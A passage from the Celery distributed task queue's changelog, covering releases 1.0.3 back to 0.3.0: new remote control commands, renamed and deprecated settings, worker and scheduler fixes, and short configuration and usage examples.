{'ok': 'new rate limit set successfully'}}, {'worker2': {'ok': 'new rate limit set successfully'}}] * ping(destination=all, reply=False, timeout=1, limit=0) Worker returns the simple message `"pong"`. >>> from celery.task.control import ping >>> ping(reply=True) [{'worker1': 'pong'}, {'worker2': 'pong'}, * revoke(destination=all, reply=False, timeout=1, limit=0) Worker simply returns `True`. >>> from celery.task.control import revoke >>> revoke('419e46eb-cf6a-4271-86a8-442b7124132c', reply=True) [{'worker1': True}, {'worker2'; True}] * You can now add your own remote control commands! Remote control commands are functions registered in the command registry. Registering a command is done using :meth:`celery.worker.control.Panel.register`: .. code-block:: python from celery.task.control import Panel @Panel.register def reset_broker_connection(state, **kwargs): state.consumer.reset_connection() return {'ok': 'connection re-established'} With this module imported in the worker, you can launch the command using `celery.task.control.broadcast`:: >>> from celery.task.control import broadcast >>> broadcast('reset_broker_connection', reply=True) [{'worker1': {'ok': 'connection re-established'}, {'worker2': {'ok': 'connection re-established'}}] **TIP** You can choose the worker(s) to receive the command by using the `destination` argument:: >>> broadcast('reset_broker_connection', destination=['worker1']) [{'worker1': {'ok': 'connection re-established'}] * New remote control command: `dump_reserved` Dumps tasks reserved by the worker, waiting to be executed:: >>> from celery.task.control import broadcast >>> broadcast('dump_reserved', reply=True) [{'myworker1': []}] * New remote control command: `dump_schedule` Dumps the workers currently registered ETA schedule. These are tasks with an `eta` (or `countdown`) argument waiting to be executed by the worker. >>> from celery.task.control import broadcast >>> broadcast('dump_schedule', reply=True) [{'w1': []}, {'w3': []}, {'w2': ['0. 2010-05-12 11:06:00 pri0 ,)', kwargs:'{'page': 2}'}>']}, {'w4': ['0. 2010-05-12 11:00:00 pri0 ,)', kwargs:'{\'page\': 1}'}>', '1. 2010-05-12 11:12:00 pri0 ,)', kwargs:'{\'page\': 3}'}>']}] .. _v103-fixes: Fixes ----- * Mediator thread no longer blocks for more than 1 second. With rate limits enabled and when there was a lot of remaining time, the mediator thread could block shutdown (and potentially block other jobs from coming in). * Remote rate limits wasn't properly applied (Issue #98). * Now handles exceptions with Unicode messages correctly in `TaskRequest.on_failure`. * Database backend: `TaskMeta.result`: default value should be `None` not empty string. .. _version-1.0.2: 1.0.2 ===== :release-date: 2010-03-31 12:50 p.m. CET :release-by: Ask Solem * Deprecated: :setting:`CELERY_BACKEND`, please use :setting:`CELERY_RESULT_BACKEND` instead. * We now use a custom logger in tasks. This logger supports task magic keyword arguments in formats. The default format for tasks (:setting:`CELERYD_TASK_LOG_FORMAT`) now includes the id and the name of tasks so the origin of task log messages can easily be traced. Example output:: [2010-03-25 13:11:20,317: INFO/PoolWorker-1] [tasks.add(a6e1c5ad-60d9-42a0-8b24-9e39363125a4)] Hello from add To revert to the previous behavior you can set:: CELERYD_TASK_LOG_FORMAT = """ [%(asctime)s: %(levelname)s/%(processName)s] %(message)s """.strip() * Unit tests: Don't disable the django test database tear down, instead fixed the underlying issue which was caused by modifications to the `DATABASE_NAME` setting (Issue #82). * Django Loader: New config :setting:`CELERY_DB_REUSE_MAX` (max number of tasks to reuse the same database connection) The default is to use a new connection for every task. We'd very much like to reuse the connection, but a safe number of reuses isn't known, and we don't have any way to handle the errors that might happen, which may even be database dependent. See: http://bit.ly/94fwdd * worker: The worker components are now configurable: :setting:`CELERYD_POOL`, :setting:`CELERYD_CONSUMER`, :setting:`CELERYD_MEDIATOR`, and :setting:`CELERYD_ETA_SCHEDULER`. The default configuration is as follows: .. code-block:: python CELERYD_POOL = 'celery.concurrency.processes.TaskPool' CELERYD_MEDIATOR = 'celery.worker.controllers.Mediator' CELERYD_ETA_SCHEDULER = 'celery.worker.controllers.ScheduleController' CELERYD_CONSUMER = 'celery.worker.consumer.Consumer' The :setting:`CELERYD_POOL` setting makes it easy to swap out the multiprocessing pool with a threaded pool, or how about a twisted/eventlet pool? Consider the competition for the first pool plug-in started! * Debian init-scripts: Use `-a` not `&&` (Issue #82). * Debian init-scripts: Now always preserves `$CELERYD_OPTS` from the `/etc/default/celeryd` and `/etc/default/celerybeat`. * celery.beat.Scheduler: Fixed a bug where the schedule wasn't properly flushed to disk if the schedule hadn't been properly initialized. * ``celerybeat``: Now syncs the schedule to disk when receiving the :sig:`SIGTERM` and :sig:`SIGINT` signals. * Control commands: Make sure keywords arguments aren't in Unicode. * ETA scheduler: Was missing a logger object, so the scheduler crashed when trying to log that a task had been revoked. * ``management.commands.camqadm``: Fixed typo `camqpadm` -> `camqadm` (Issue #83). * PeriodicTask.delta_resolution: wasn't working for days and hours, now fixed by rounding to the nearest day/hour. * Fixed a potential infinite loop in `BaseAsyncResult.__eq__`, although there's no evidence that it has ever been triggered. * worker: Now handles messages with encoding problems by acking them and emitting an error message. .. _version-1.0.1: 1.0.1 ===== :release-date: 2010-02-24 07:05 p.m. CET :release-by: Ask Solem * Tasks are now acknowledged early instead of late. This is done because messages can only be acknowledged within the same connection channel, so if the connection is lost we'd've to re-fetch the message again to acknowledge it. This might or might not affect you, but mostly those running tasks with a really long execution time are affected, as all tasks that's made it all the way into the pool needs to be executed before the worker can safely terminate (this is at most the number of pool workers, multiplied by the :setting:`CELERYD_PREFETCH_MULTIPLIER` setting). We multiply the prefetch count by default to increase the performance at times with bursts of tasks with a short execution time. If this doesn't apply to your use case, you should be able to set the prefetch multiplier to zero, without sacrificing performance. .. note:: A patch to :mod:`multiprocessing` is currently being worked on, this patch would enable us to use a better solution, and is scheduled for inclusion in the `2.0.0` release. * The worker now shutdowns cleanly when receiving the :sig:`SIGTERM` signal. * The worker now does a cold shutdown if the :sig:`SIGINT` signal is received (:kbd:`Control-c`), this means it tries to terminate as soon as possible. * Caching of results now moved to the base backend classes, so no need to implement this functionality in the base classes. * Caches are now also limited in size, so their memory usage doesn't grow out of control. You can set the maximum number of results the cache can hold using the :setting:`CELERY_MAX_CACHED_RESULTS` setting (the default is five thousand results). In addition, you can re-fetch already retrieved results using `backend.reload_task_result` + `backend.reload_taskset_result` (that's for those who want to send results incrementally). * The worker now works on Windows again. .. warning:: If you're using Celery with Django, you can't use `project.settings` as the settings module name, but the following should work: .. code-block:: console $ python manage.py celeryd --settings=settings * Execution: `.messaging.TaskPublisher.send_task` now incorporates all the functionality apply_async previously did. Like converting countdowns to ETA, so :func:`celery.execute.apply_async` is now simply a convenient front-end to :meth:`celery.messaging.TaskPublisher.send_task`, using the task classes default options. Also :func:`celery.execute.send_task` has been introduced, which can apply tasks using just the task name (useful if the client doesn't have the destination task in its task registry). Example: >>> from celery.execute import send_task >>> result = send_task('celery.ping', args=[], kwargs={}) >>> result.get() 'pong' * `camqadm`: This is a new utility for command-line access to the AMQP API. Excellent for deleting queues/bindings/exchanges, experimentation and testing: .. code-block:: console $ camqadm 1> help Gives an interactive shell, type `help` for a list of commands. When using Django, use the management command instead: .. code-block:: console $ python manage.py camqadm 1> help * Redis result backend: To conform to recent Redis API changes, the following settings has been deprecated: * `REDIS_TIMEOUT` * `REDIS_CONNECT_RETRY` These will emit a `DeprecationWarning` if used. A `REDIS_PASSWORD` setting has been added, so you can use the new simple authentication mechanism in Redis. * The redis result backend no longer calls `SAVE` when disconnecting, as this is apparently better handled by Redis itself. * If `settings.DEBUG` is on, the worker now warns about the possible memory leak it can result in. * The ETA scheduler now sleeps at most two seconds between iterations. * The ETA scheduler now deletes any revoked tasks it might encounter. As revokes aren't yet persistent, this is done to make sure the task is revoked even though, for example, it's currently being hold because its ETA is a week into the future. * The `task_id` argument is now respected even if the task is executed eagerly (either using apply, or :setting:`CELERY_ALWAYS_EAGER`). * The internal queues are now cleared if the connection is reset. * New magic keyword argument: `delivery_info`. Used by retry() to resend the task to its original destination using the same exchange/routing_key. * Events: Fields wasn't passed by `.send()` (fixes the UUID key errors in celerymon) * Added `--schedule`/`-s` option to the worker, so it is possible to specify a custom schedule filename when using an embedded ``celerybeat`` server (the `-B`/`--beat`) option. * Better Python 2.4 compatibility. The test suite now passes. * task decorators: Now preserve docstring as `cls.__doc__`, (was previously copied to `cls.run.__doc__`) * The `testproj` directory has been renamed to `tests` and we're now using `nose` + `django-nose` for test discovery, and `unittest2` for test cases. * New pip requirements files available in :file:`requirements`. * TaskPublisher: Declarations are now done once (per process). * Added `Task.delivery_mode` and the :setting:`CELERY_DEFAULT_DELIVERY_MODE` setting. These can be used to mark messages non-persistent (i.e., so they're lost if the broker is restarted). * Now have our own `ImproperlyConfigured` exception, instead of using the Django one. * Improvements to the Debian init-scripts: Shows an error if the program is not executable. Does not modify `CELERYD` when using django with virtualenv. .. _version-1.0.0: 1.0.0 ===== :release-date: 2010-02-10 04:00 p.m. CET :release-by: Ask Solem .. _v100-incompatible: Backward incompatible changes ----------------------------- * Celery doesn't support detaching anymore, so you have to use the tools available on your platform, or something like :pypi:`supervisor` to make ``celeryd``/``celerybeat``/``celerymon`` into background processes. We've had too many problems with the worker daemonizing itself, so it was decided it has to be removed. Example start-up scripts has been added to the `extra/` directory: * Debian, Ubuntu, (:command:`start-stop-daemon`) `extra/debian/init.d/celeryd` `extra/debian/init.d/celerybeat` * macOS :command:`launchd` `extra/mac/org.celeryq.celeryd.plist` `extra/mac/org.celeryq.celerybeat.plist` `extra/mac/org.celeryq.celerymon.plist` * Supervisor (http://supervisord.org) `extra/supervisord/supervisord.conf` In addition to `--detach`, the following program arguments has been removed: `--uid`, `--gid`, `--workdir`, `--chroot`, `--pidfile`, `--umask`. All good daemonization tools should support equivalent functionality, so don't worry. Also the following configuration keys has been removed: `CELERYD_PID_FILE`, `CELERYBEAT_PID_FILE`, `CELERYMON_PID_FILE`. * Default worker loglevel is now `WARN`, to enable the previous log level start the worker with `--loglevel=INFO`. * Tasks are automatically registered. This means you no longer have to register your tasks manually. You don't have to change your old code right away, as it doesn't matter if a task is registered twice. If you don't want your task to be automatically registered you can set the `abstract` attribute .. code-block:: python class MyTask(Task): abstract = True By using `abstract` only tasks subclassing this task will be automatically registered (this works like the Django ORM). If you don't want subclasses to be registered either, you can set the `autoregister` attribute to `False`. Incidentally, this change also fixes the problems with automatic name assignment and relative imports. So you also don't have to specify a task name anymore if you use relative imports. * You can no longer use regular functions as tasks. This change was added because it makes the internals a lot more clean and simple. However, you can now turn functions into tasks by using the `@task` decorator: .. code-block:: python from celery.decorators import task @task() def add(x, y): return x + y .. seealso:: :ref:`guide-tasks` for more information about the task decorators. * The periodic task system has been rewritten to a centralized solution. This means the worker no longer schedules periodic tasks by default, but a new daemon has been introduced: `celerybeat`. To launch the periodic task scheduler you have to run ``celerybeat``: .. code-block:: console $ celerybeat Make sure this is running on one server only, if you run it twice, all periodic tasks will also be executed twice. If you only have one worker server you can embed it into the worker like this: .. code-block:: console $ celeryd --beat # Embed celerybeat in celeryd. * The supervisor has been removed. This means the `-S` and `--supervised` options to `celeryd` is no longer supported. Please use something like http://supervisord.org instead. * `TaskSet.join` has been removed, use `TaskSetResult.join` instead. * The task status `"DONE"` has been renamed to `"SUCCESS"`. * `AsyncResult.is_done` has been removed, use `AsyncResult.successful` instead. * The worker no longer stores errors if `Task.ignore_result` is set, to revert to the previous behavior set :setting:`CELERY_STORE_ERRORS_EVEN_IF_IGNORED` to `True`. * The statistics functionality has been removed in favor of events, so the `-S` and --statistics` switches has been removed. * The module `celery.task.strategy` has been removed. * `celery.discovery` has been removed, and it's ``autodiscover`` function is now in `celery.loaders.djangoapp`. Reason: Internal API. * The :envvar:`CELERY_LOADER` environment variable now needs loader class name in addition to module name, For example, where you previously had: `"celery.loaders.default"`, you now need `"celery.loaders.default.Loader"`, using the previous syntax will result in a `DeprecationWarning`. * Detecting the loader is now lazy, and so isn't done when importing `celery.loaders`. To make this happen `celery.loaders.settings` has been renamed to `load_settings` and is now a function returning the settings object. `celery.loaders.current_loader` is now also a function, returning the current loader. So:: loader = current_loader needs to be changed to:: loader = current_loader() .. _v100-deprecations: Deprecations ------------ * The following configuration variables has been renamed and will be deprecated in v2.0: * ``CELERYD_DAEMON_LOG_FORMAT`` -> ``CELERYD_LOG_FORMAT`` * ``CELERYD_DAEMON_LOG_LEVEL`` -> ``CELERYD_LOG_LEVEL`` * ``CELERY_AMQP_CONNECTION_TIMEOUT`` -> ``CELERY_BROKER_CONNECTION_TIMEOUT`` * ``CELERY_AMQP_CONNECTION_RETRY`` -> ``CELERY_BROKER_CONNECTION_RETRY`` * ``CELERY_AMQP_CONNECTION_MAX_RETRIES`` -> ``CELERY_BROKER_CONNECTION_MAX_RETRIES`` * ``SEND_CELERY_TASK_ERROR_EMAILS`` -> ``CELERY_SEND_TASK_ERROR_EMAILS`` * The public API names in celery.conf has also changed to a consistent naming scheme. * We now support consuming from an arbitrary number of queues. To do this we had to rename the configuration syntax. If you use any of the custom AMQP routing options (queue/exchange/routing_key, etc.), you should read the new FAQ entry: :ref:`faq-task-routing`. The previous syntax is deprecated and scheduled for removal in v2.0. * `TaskSet.run` has been renamed to `TaskSet.apply_async`. `TaskSet.run` has now been deprecated, and is scheduled for removal in v2.0. .. v100-news: News ---- * Rate limiting support (per task type, or globally). * New periodic task system. * Automatic registration. * New cool task decorator syntax. * worker: now sends events if enabled with the `-E` argument. Excellent for monitoring tools, one is already in the making (https://github.com/celery/celerymon). Current events include: :event:`worker-heartbeat`, task-[received/succeeded/failed/retried], :event:`worker-online`, :event:`worker-offline`. * You can now delete (revoke) tasks that's already been applied. * You can now set the hostname the worker identifies as using the `--hostname` argument. * Cache backend now respects the :setting:`CELERY_TASK_RESULT_EXPIRES` setting. * Message format has been standardized and now uses ISO-8601 format for dates instead of datetime. * worker now responds to the :sig:`SIGHUP` signal by restarting itself. * Periodic tasks are now scheduled on the clock. That is, `timedelta(hours=1)` means every hour at :00 minutes, not every hour from the server starts. To revert to the previous behavior you can set `PeriodicTask.relative = True`. * Now supports passing execute options to a TaskSets list of args. Example: .. code-block:: pycon >>> ts = TaskSet(add, [([2, 2], {}, {'countdown': 1}), ... ([4, 4], {}, {'countdown': 2}), ... ([8, 8], {}, {'countdown': 3})]) >>> ts.run() * Got a 3x performance gain by setting the prefetch count to four times the concurrency, (from an average task round-trip of 0.1s to 0.03s!). A new setting has been added: :setting:`CELERYD_PREFETCH_MULTIPLIER`, which is set to `4` by default. * Improved support for webhook tasks. `celery.task.rest` is now deprecated, replaced with the new and shiny `celery.task.http`. With more reflective names, sensible interface, and it's possible to override the methods used to perform HTTP requests. * The results of task sets are now cached by storing it in the result backend. .. _v100-changes: Changes ------- * Now depends on :pypi:`carrot` >= 0.8.1 * New dependencies: :pypi:`billiard`, :pypi:`python-dateutil`, :pypi:`django-picklefield`. * No longer depends on python-daemon * The `uuid` distribution is added as a dependency when running Python 2.4. * Now remembers the previously detected loader by keeping it in the :envvar:`CELERY_LOADER` environment variable. This may help on windows where fork emulation is used. * ETA no longer sends datetime objects, but uses ISO 8601 date format in a string for better compatibility with other platforms. * No longer sends error mails for retried tasks. * Task can now override the backend used to store results. * Refactored the ExecuteWrapper, `apply` and :setting:`CELERY_ALWAYS_EAGER` now also executes the task callbacks and signals. * Now using a proper scheduler for the tasks with an ETA. This means waiting ETA tasks are sorted by time, so we don't have to poll the whole list all the time. * Now also imports modules listed in :setting:`CELERY_IMPORTS` when running with django (as documented). * Log level for stdout/stderr changed from INFO to ERROR * ImportErrors are now properly propagated when auto-discovering tasks. * You can now use `celery.messaging.establish_connection` to establish a connection to the broker. * When running as a separate service the periodic task scheduler does some smart moves to not poll too regularly. If you need faster poll times you can lower the value of :setting:`CELERYBEAT_MAX_LOOP_INTERVAL`. * You can now change periodic task intervals at runtime, by making `run_every` a property, or subclassing `PeriodicTask.is_due`. * The worker now supports control commands enabled through the use of a broadcast queue, you can remotely revoke tasks or set the rate limit for a task type. See :mod:`celery.task.control`. * The services now sets informative process names (as shown in `ps` listings) if the :pypi:`setproctitle` module is installed. * :exc:`~@NotRegistered` now inherits from :exc:`KeyError`, and `TaskRegistry.__getitem__`+`pop` raises `NotRegistered` instead * You can set the loader via the :envvar:`CELERY_LOADER` environment variable. * You can now set :setting:`CELERY_IGNORE_RESULT` to ignore task results by default (if enabled, tasks doesn't save results or errors to the backend used). * The worker now correctly handles malformed messages by throwing away and acknowledging the message, instead of crashing. .. _v100-bugs: Bugs ---- * Fixed a race condition that could happen while storing task results in the database. .. _v100-documentation: Documentation ------------- * Reference now split into two sections; API reference and internal module reference. .. _version-0.8.4: 0.8.4 ===== :release-date: 2010-02-05 01:52 p.m. CEST :release-by: Ask Solem * Now emits a warning if the --detach argument is used. --detach shouldn't be used anymore, as it has several not easily fixed bugs related to it. Instead, use something like start-stop-daemon, :pypi:`supervisor` or :command:`launchd` (macOS). * Make sure logger class is process aware, even if running Python >= 2.6. * Error emails are not sent anymore when the task is retried. .. _version-0.8.3: 0.8.3 ===== :release-date: 2009-12-22 09:43 a.m. CEST :release-by: Ask Solem * Fixed a possible race condition that could happen when storing/querying task results using the database backend. * Now has console script entry points in the :file:`setup.py` file, so tools like :pypi:`zc.buildout` will correctly install the programs ``celeryd`` and ``celeryinit``. .. _version-0.8.2: 0.8.2 ===== :release-date: 2009-11-20 03:40 p.m. CEST :release-by: Ask Solem * QOS Prefetch count wasn't applied properly, as it was set for every message received (which apparently behaves like, "receive one more"), instead of only set when our wanted value changed. .. _version-0.8.1: 0.8.1 ================================= :release-date: 2009-11-16 05:21 p.m. CEST :release-by: Ask Solem .. _v081-very-important: Very important note ------------------- This release (with carrot 0.8.0) enables AMQP QoS (quality of service), which means the workers will only receive as many messages as it can handle at a time. As with any release, you should test this version upgrade on your development servers before rolling it out to production! .. _v081-important: Important changes ----------------- * If you're using Python < 2.6 and you use the multiprocessing backport, then multiprocessing version 2.6.2.1 is required. * All AMQP_* settings has been renamed to BROKER_*, and in addition AMQP_SERVER has been renamed to BROKER_HOST, so before where you had:: AMQP_SERVER = 'localhost' AMQP_PORT = 5678 AMQP_USER = 'myuser' AMQP_PASSWORD = 'mypassword' AMQP_VHOST = 'celery' You need to change that to:: BROKER_HOST = 'localhost' BROKER_PORT = 5678 BROKER_USER = 'myuser' BROKER_PASSWORD = 'mypassword' BROKER_VHOST = 'celery' * Custom carrot backends now need to include the backend class name, so before where you had:: CARROT_BACKEND = 'mycustom.backend.module' you need to change it to:: CARROT_BACKEND = 'mycustom.backend.module.Backend' where `Backend` is the class name. This is probably `"Backend"`, as that was the previously implied name. * New version requirement for carrot: 0.8.0 .. _v081-changes: Changes ------- * Incorporated the multiprocessing backport patch that fixes the `processName` error. * Ignore the result of PeriodicTask's by default. * Added a Redis result store backend * Allow :file:`/etc/default/celeryd` to define additional options for the ``celeryd`` init-script. * MongoDB periodic tasks issue when using different time than UTC fixed. * Windows specific: Negate test for available ``os.fork`` (thanks :github_user:`miracle2k`). * Now tried to handle broken PID files. * Added a Django test runner to contrib that sets `CELERY_ALWAYS_EAGER = True` for testing with the database backend. * Added a :setting:`CELERY_CACHE_BACKEND` setting for using something other than the Django-global cache backend. * Use custom implementation of ``functools.partial`` for Python 2.4 support (Probably still problems with running on 2.4, but it will eventually be supported) * Prepare exception to pickle when saving :state:`RETRY` status for all backends. * SQLite no concurrency limit should only be effective if the database backend is used. .. _version-0.8.0: 0.8.0 ===== :release-date: 2009-09-22 03:06 p.m. CEST :release-by: Ask Solem .. _v080-incompatible: Backward incompatible changes ----------------------------- * Add traceback to result value on failure. .. note:: If you use the database backend you have to re-create the database table `celery_taskmeta`. Contact the :ref:`mailing-list` or :ref:`irc-channel` channel for help doing this. * Database tables are now only created if the database backend is used, so if you change back to the database backend at some point, be sure to initialize tables (django: `syncdb`, python: `celeryinit`). .. note:: This is only applies if using Django version 1.1 or higher. * Now depends on `carrot` version 0.6.0. * Now depends on python-daemon 1.4.8 .. _v080-important: Important changes ----------------- * Celery can now be used in pure Python (outside of a Django project). This means Celery is no longer Django specific. For more information see the FAQ entry :ref:`faq-is-celery-for-django-only`. * Celery now supports task retries. See :ref:`task-retry` for more information. * We now have an AMQP result store backend. It uses messages to publish task return value and status. And it's incredibly fast! See issue #6 for more info! * AMQP QoS (prefetch count) implemented: This to not receive more messages than we can handle. * Now redirects stdout/stderr to the workers log file when detached * Now uses `inspect.getargspec` to only pass default arguments the task supports. * Add Task.on_success, .on_retry, .on_failure handlers See :meth:`celery.task.base.Task.on_success`, :meth:`celery.task.base.Task.on_retry`, :meth:`celery.task.base.Task.on_failure`, * `celery.utils.gen_unique_id`: Workaround for http://bugs.python.org/issue4607 * You can now customize what happens at worker start, at process init, etc., by creating your own loaders (see :mod:`celery.loaders.default`, :mod:`celery.loaders.djangoapp`, :mod:`celery.loaders`). * Support for multiple AMQP exchanges and queues. This feature misses documentation and tests, so anyone interested is encouraged to improve this situation. * The worker now survives a restart of the AMQP server! Automatically re-establish AMQP broker connection if it's lost. New settings: * AMQP_CONNECTION_RETRY Set to `True` to enable connection retries. * AMQP_CONNECTION_MAX_RETRIES. Maximum number of restarts before we give up. Default: `100`. .. _v080-news: News ---- * Fix an incompatibility between python-daemon and multiprocessing, which resulted in the `[Errno 10] No child processes` problem when detaching. * Fixed a possible DjangoUnicodeDecodeError being raised when saving pickled data to Django`s Memcached cache backend. * Better Windows compatibility. * New version of the pickled field (taken from http://www.djangosnippets.org/snippets/513/) * New signals introduced: `task_sent`, `task_prerun` and `task_postrun`, see :mod:`celery.signals` for more information. * `TaskSetResult.join` caused `TypeError` when `timeout=None`. Thanks Jerzy Kozera. Closes #31 * `views.apply` should return `HttpResponse` instance. Thanks to Jerzy Kozera. Closes #32 * `PeriodicTask`: Save conversion of `run_every` from `int` to `timedelta` to the class attribute instead of on the instance. * Exceptions has been moved to `celery.exceptions`, but are still available in the previous module. * Try to rollback transaction and retry saving result if an error happens while setting task status with the database backend. * jail() refactored into :class:`celery.execute.ExecuteWrapper`. * `views.apply` now correctly sets mime-type to "application/json" * `views.task_status` now returns exception if state is :state:`RETRY` * `views.task_status` now returns traceback if state is :state:`FAILURE` or :state:`RETRY` * Documented default task arguments. * Add a sensible __repr__ to ExceptionInfo for easier debugging * Fix documentation typo `.. import map` -> `.. import dmap`. Thanks to :github_user:`mikedizon`. .. _version-0.6.0: 0.6.0 ===== :release-date: 2009-08-07 06:54 a.m. CET :release-by: Ask Solem .. _v060-important: Important changes ----------------- * Fixed a bug where tasks raising unpickleable exceptions crashed pool workers. So if you've had pool workers mysteriously disappearing, or problems with the worker stopping working, this has been fixed in this version. * Fixed a race condition with periodic tasks. * The task pool is now supervised, so if a pool worker crashes, goes away or stops responding, it is automatically replaced with a new one. * Task.name is now automatically generated out of class module+name, for example `"djangotwitter.tasks.UpdateStatusesTask"`. Very convenient. No idea why we didn't do this before. Some documentation is updated to not manually specify a task name. .. _v060-news: News ---- * Tested with Django 1.1 * New Tutorial: Creating a click counter using Carrot and Celery * Database entries for periodic tasks are now created at the workers start-up instead of for each check (which has been a forgotten TODO/XXX in the code for a long time) * New settings variable: :setting:`CELERY_TASK_RESULT_EXPIRES` Time (in seconds, or a `datetime.timedelta` object) for when after stored task results are deleted. For the moment this only works for the database backend. * The worker now emits a debug log message for which periodic tasks has been launched. * The periodic task table is now locked for reading while getting periodic task status (MySQL only so far, seeking patches for other engines) * A lot more debugging information is now available by turning on the `DEBUG` log level (`--loglevel=DEBUG`). * Functions/methods with a timeout argument now works correctly. * New: `celery.strategy.even_time_distribution`: With an iterator yielding task args, kwargs tuples, evenly distribute the processing of its tasks throughout the time window available. * Log message `Unknown task ignored...` now has log level `ERROR` * Log message when task is received is now emitted for all tasks, even if the task has an ETA (estimated time of arrival). Also the log message now includes the ETA for the task (if any). * Acknowledgment now happens in the pool callback. Can't do ack in the job target, as it's not pickleable (can't share AMQP connection, etc.). * Added note about .delay hanging in README * Tests now passing in Django 1.1 * Fixed discovery to make sure app is in INSTALLED_APPS * Previously overridden pool behavior (process reap, wait until pool worker available, etc.) is now handled by `multiprocessing.Pool` itself. * Convert statistics data to Unicode for use as kwargs. Thanks Lucy! .. _version-0.4.1: 0.4.1 ===== :release-date: 2009-07-02 01:42 p.m. CET :release-by: Ask Solem * Fixed a bug with parsing the message options (`mandatory`, `routing_key`, `priority`, `immediate`) .. _version-0.4.0: 0.4.0 ===== :release-date: 2009-07-01 07:29 p.m. CET :release-by: Ask Solem * Adds eager execution. `celery.execute.apply`|`Task.apply` executes the function blocking until the task is done, for API compatibility it returns a `celery.result.EagerResult` instance. You can configure Celery to always run tasks locally by setting the :setting:`CELERY_ALWAYS_EAGER` setting to `True`. * Now depends on `anyjson`. * 99% coverage using Python `coverage` 3.0. .. _version-0.3.20: 0.3.20 ====== :release-date: 2009-06-25 08:42 p.m. CET :release-by: Ask Solem * New arguments to `apply_async` (the advanced version of `delay_task`), `countdown` and `eta`; >>> # Run 10 seconds into the future. >>> res = apply_async(MyTask, countdown=10); >>> # Run 1 day from now >>> res = apply_async(MyTask, ... eta=datetime.now() + timedelta(days=1)) * Now unlinks stale PID files * Lots of more tests. * Now compatible with carrot >= 0.5.0. * **IMPORTANT** The `subtask_ids` attribute on the `TaskSetResult` instance has been removed. To get this information instead use: >>> subtask_ids = [subtask.id for subtask in ts_res.subtasks] * `Taskset.run()` now respects extra message options from the task class. * Task: Add attribute `ignore_result`: Don't store the status and return value. This means you can't use the `celery.result.AsyncResult` to check if the task is done, or get its return value. Only use if you need the performance and is able live without these features. Any exceptions raised will store the return value/status as usual. * Task: Add attribute `disable_error_emails` to disable sending error emails for that task. * Should now work on Windows (although running in the background won't work, so using the `--detach` argument results in an exception being raised). * Added support for statistics for profiling and monitoring. To start sending statistics start the worker with the `--statistics option. Then after a while you can dump the results by running `python manage.py celerystats`. See `celery.monitoring` for more information. * The Celery daemon can now be supervised (i.e., it is automatically restarted if it crashes). To use this start the worker with the --supervised` option (or alternatively `-S`). * views.apply: View calling a task. Example: .. code-block:: text http://e.com/celery/apply/task_name/arg1/arg2//?kwarg1=a&kwarg2=b .. warning:: Use with caution! Don't expose this URL to the public without first ensuring that your code is safe! * Refactored `celery.task`. It's now split into three modules: * ``celery.task`` Contains `apply_async`, `delay_task`, `discard_all`, and task shortcuts, plus imports objects from `celery.task.base` and `celery.task.builtins` * ``celery.task.base`` Contains task base classes: `Task`, `PeriodicTask`, `TaskSet`, `AsynchronousMapTask`, `ExecuteRemoteTask`. * ``celery.task.builtins`` Built-in tasks: `PingTask`, `DeleteExpiredTaskMetaTask`. .. _version-0.3.7: 0.3.7 ===== :release-date: 2008-06-16 11:41 p.m. CET :release-by: Ask Solem * **IMPORTANT** Now uses AMQP`s `basic.consume` instead of `basic.get`. This means we're no longer polling the broker for new messages. * **IMPORTANT** Default concurrency limit is now set to the number of CPUs available on the system. * **IMPORTANT** `tasks.register`: Renamed `task_name` argument to `name`, so:: >>> tasks.register(func, task_name='mytask') has to be replaced with:: >>> tasks.register(func, name='mytask') * The daemon now correctly runs if the pidfile is stale. * Now compatible with carrot 0.4.5 * Default AMQP connection timeout is now 4 seconds. * `AsyncResult.read()` was always returning `True`. * Only use README as long_description if the file exists so easy_install doesn't break. * `celery.view`: JSON responses now properly set its mime-type. * `apply_async` now has a `connection` keyword argument so you can re-use the same AMQP connection if you want to execute more than one task. * Handle failures in task_status view such that it won't throw 500s. * Fixed typo `AMQP_SERVER` in documentation to `AMQP_HOST`. * Worker exception emails sent to administrators now works properly. * No longer depends on `django`, so installing `celery` won't affect the preferred Django version installed. * Now works with PostgreSQL (:pypi:`psycopg2`) again by registering the `PickledObject` field. * Worker: Added `--detach` option as an alias to `--daemon`, and it's the term used in the documentation from now on. * Make sure the pool and periodic task worker thread is terminated properly at exit (so :kbd:`Control-c` works again). * Now depends on `python-daemon`. * Removed dependency to `simplejson` * Cache Backend: Re-establishes connection for every task process if the Django cache backend is :pypi:`python-memcached`/:pypi:`libmemcached`. * Tyrant Backend: Now re-establishes the connection for every task executed. .. _version-0.3.3: 0.3.3 ===== :release-date: 2009-06-08 01:07 p.m. CET :release-by: Ask Solem * The `PeriodicWorkController` now sleeps for 1 second between checking for periodic tasks to execute. .. _version-0.3.2: 0.3.2 ===== :release-date: 2009-06-08 01:07 p.m. CET :release-by: Ask Solem * worker: Added option `--discard`: Discard (delete!) all waiting messages in the queue. * Worker: The `--wakeup-after` option wasn't handled as a float. .. _version-0.3.1: 0.3.1 ===== :release-date: 2009-06-08 01:07 p.m. CET :release-by: Ask Solem * The `PeriodicTask` worker is now running in its own thread instead of blocking the `TaskController` loop. * Default `QUEUE_WAKEUP_AFTER` has been lowered to `0.1` (was `0.3`) .. _version-0.3.0: 0.3.0 ===== :release-date: 2009-06-08 12:41 p.m. CET :release-by: Ask Solem .. warning:: This is a development version, for the stable release, please see versions 0.2.x. **VERY IMPORTANT:** Pickle is now the encoder used for serializing task arguments, so be sure to flush your task queue before you upgrade. * **IMPORTANT** TaskSet.run() now returns a ``celery.result.TaskSetResult`` instance, which lets you inspect the status and return values of a taskset as it was a single entity. * **IMPORTANT** Celery now depends on carrot >= 0.4.1. * The Celery daemon now sends task errors to the registered admin emails. To turn off this feature, set `SEND_CELERY_TASK_ERROR_EMAILS` to `False` in your `settings.py`. Thanks to Grégoire Cachet. * You can now run the Celery daemon by using `manage.py`: .. code-block:: console $ python manage.py celeryd Thanks to Grégoire Cachet. * Added support for message priorities, topic exchanges, custom routing keys for tasks. This means we've introduced `celery.task.apply_async`, a new way of executing tasks. You can use `celery.task.delay` and `celery.Task.delay` like usual, but if you want greater control over the message sent, you want `celery.task.apply_async` and `celery.Task.apply_async`. This also means the AMQP configuration has changed. Some settings has been renamed, while others are new: - ``CELERY_AMQP_EXCHANGE`` - ``CELERY_AMQP_PUBLISHER_ROUTING_KEY`` - ``CELERY_AMQP_CONSUMER_ROUTING_KEY`` - ``CELERY_AMQP_CONSUMER_QUEUE`` - ``CELERY_AMQP_EXCHANGE_TYPE`` See the entry :ref:`faq-task-routing` in the 